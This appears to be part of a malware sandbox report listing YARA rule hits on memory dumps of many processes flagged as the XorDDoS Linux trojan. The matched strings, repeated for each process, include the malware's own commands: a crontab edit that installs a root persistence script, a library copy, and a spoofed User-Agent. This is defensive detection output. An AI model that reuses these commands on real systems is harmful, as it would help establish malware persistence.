9761.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9761.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9838.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9838.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9838.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9838.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9607.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9607.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9607.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9607.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9772.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9772.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9772.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9772.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10148.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10148.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10148.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10148.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10280.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10280.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10280.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10280.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10291.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10291.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10291.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10291.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9948.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9948.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9948.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9948.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9662.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9662.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9662.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9662.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10346.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10346.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10346.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10346.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9739.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9739.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9739.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9739.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10093.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10093.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10093.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10093.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10104.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10104.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10104.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10104.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9462.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9462.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9462.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9462.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10005.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10005.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10005.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10005.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9454.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9454.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9454.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9454.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10016.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10016.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10016.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10016.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9651.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9651.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9651.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9651.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9629.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9629.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9629.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9629.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9585.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9585.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9585.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9585.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9959.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
9959.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
9959.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
9959.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10269.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10269.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10269.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10269.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
10258.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
10258.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
10258.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
10258.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
9816.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
